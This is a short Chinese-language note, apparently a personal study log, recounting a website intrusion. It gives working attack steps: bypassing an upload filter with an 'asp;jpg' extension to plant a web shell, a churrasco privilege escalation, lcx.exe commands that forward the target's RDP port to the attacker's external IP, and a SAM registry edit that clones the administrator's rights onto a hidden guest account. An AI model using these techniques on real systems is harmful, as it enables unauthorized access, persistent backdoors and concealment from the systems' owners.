今天又看了一个***案例,拿到网站作者先扫了一下,没有发现可利用的地方,后来在网站上找到了一个用户注册的地方可以上传头像而且存在上传漏洞,但是只允许上传图片格式的,所以作者打开了firebug在其中找到上传格式验证的地方加上了一个asp;jpg再上传时上传成功
c:\RECYCLER 巴西烤肉提权    exp地址 "cmd命令"    ***内网服务器用端口转发

技术,(之前就学过,这段时间一直没机会用就忘了。)用lcx.exe  本机上运行

lcx.exe -listen 51 33891  在大马中用命令运行 lcx.exe地址 -slave 本机外网ip地

址 51 127.0.0.1 3389      
建立超级隐藏用户 cmd运行命令  net user guest

123456 打开目标机注册表(regedit)找到HKEY_LOCAL开头的那个点开找到SAM中的SAM

右击选择权限添加上在提权时添加的用户赋予完全的权限再在SAM中找到Domains---

Account---users---000001F4中F中的二进制数据全部复制(除去前四列)再点开

000001F5 将其中F中的二进制数据全部替换之后再删除SAM中添加的那个用户 cmd中再执

行命令query user 之后再次登录时用guest账号链接即可密码不变